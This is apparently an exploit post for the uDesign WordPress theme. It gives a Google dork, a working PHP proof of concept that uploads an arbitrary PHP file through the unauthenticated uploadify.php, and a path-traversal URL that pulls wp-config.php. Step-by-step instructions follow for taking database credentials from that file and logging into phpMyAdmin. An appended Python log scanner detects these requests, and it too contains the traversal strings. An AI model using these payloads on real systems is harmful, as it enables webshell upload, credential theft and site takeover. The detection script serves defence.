#- Author: Tn_Scorpion
#- Date: 18/01/2015
#- Vendor: Themeforest
#- By: andondesign
#- Link Download: themeforest.net/item/udesign-responsive-wordpress-theme/253220
#- Google Dork: inurl:wp-content/themes/u-design
#- Tested on: Windows 8
--------------------------------------------------------
Multiple Vulnerabilities
Why? Because this theme actually has two bugs, but only the file upload vulnerability got famous :'v There is actually another one, namely an Arbitrary File Download vulnerability. OK, enough ~
Proof of Concept:
--
File upload vulnerability
--
<?php
$uploadfile="3xploi7.php";
$ch = curl_init("http://3xploi7.id/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/u-design/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Result: Here!
--
File Download Vulnerability
--
http://3xploi7.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
1. Download the config file
2. Open it and look for the DB user and password
3. Log in at web.com/phpmyadmin
4. The rest is up to you.
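As an added defensive example (not part of the original post), this Python script flags the two request patterns shown above in web-server access logs: POSTs to the theme's uploadify.php, a later request for some other PHP file in that upload directory, and revslider_show_image calls whose img parameter climbs out of the slider directory (that action is served by the Slider Revolution plugin, not by the theme itself). The log lines are constructed for the example; the tag names are my own.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed Apache combined-format lines for this example (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [18/Jan/2015:10:01:02 +0000] "POST /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 512 "-" "curl/7.35.0"
203.0.113.5 - - [18/Jan/2015:10:01:03 +0000] "GET /wp-content/themes/u-design/scripts/admin/uploadify/3xploi7.php HTTP/1.1" 200 1024 "-" "curl/7.35.0"
198.51.100.7 - - [18/Jan/2015:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Jan/2015:10:02:05 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%252F..%252Fwp-config.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
192.0.2.9 - - [18/Jan/2015:10:03:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slides/banner.jpg HTTP/1.1" 200 40000 "-" "Mozilla/5.0"
192.0.2.9 - - [18/Jan/2015:10:03:01 +0000] "GET /index.php HTTP/1.1" 200 200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
UPLOADIFY_DIR = "/wp-content/themes/u-design/scripts/admin/uploadify/"
UPLOADIFY = UPLOADIFY_DIR + "uploadify.php"

def classify(line):
    """Return a finding tag for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parsed = urlparse(m["url"])
    path = parsed.path
    # 1. Any POST to the theme's uploader; the PoC above reaches it with no session cookie.
    if m["method"] == "POST" and path == UPLOADIFY:
        return "uploadify-post"
    # 2. A PHP file other than the uploader requested from the upload dir: a dropped script running.
    if path.startswith(UPLOADIFY_DIR) and path.endswith(".php") and path != UPLOADIFY:
        return "uploaded-php-executed"
    # 3. revslider_show_image whose img value climbs out of the slider directory.
    if path.endswith("/wp-admin/admin-ajax.php"):
        qs = parse_qs(parsed.query)
        if qs.get("action") == ["revslider_show_image"]:
            img = unquote(qs.get("img", [""])[0])  # parse_qs decoded once; undo double-encoding too
            if ".." in img or img.startswith("/"):
                return "revslider-traversal"
    return None

def scan(log_text):
    """Return (ip, tag, url) for every suspicious line in a log."""
    findings = []
    for line in log_text.splitlines():
        tag = classify(line)
        if tag:
            m = LOG_RE.match(line)
            findings.append((m["ip"], tag, m["url"]))
    return findings
```

Run scan() over a real access log to get the offending source addresses and URLs; a hit on tag 2 means the upload already succeeded and the file under the uploadify directory needs to be removed.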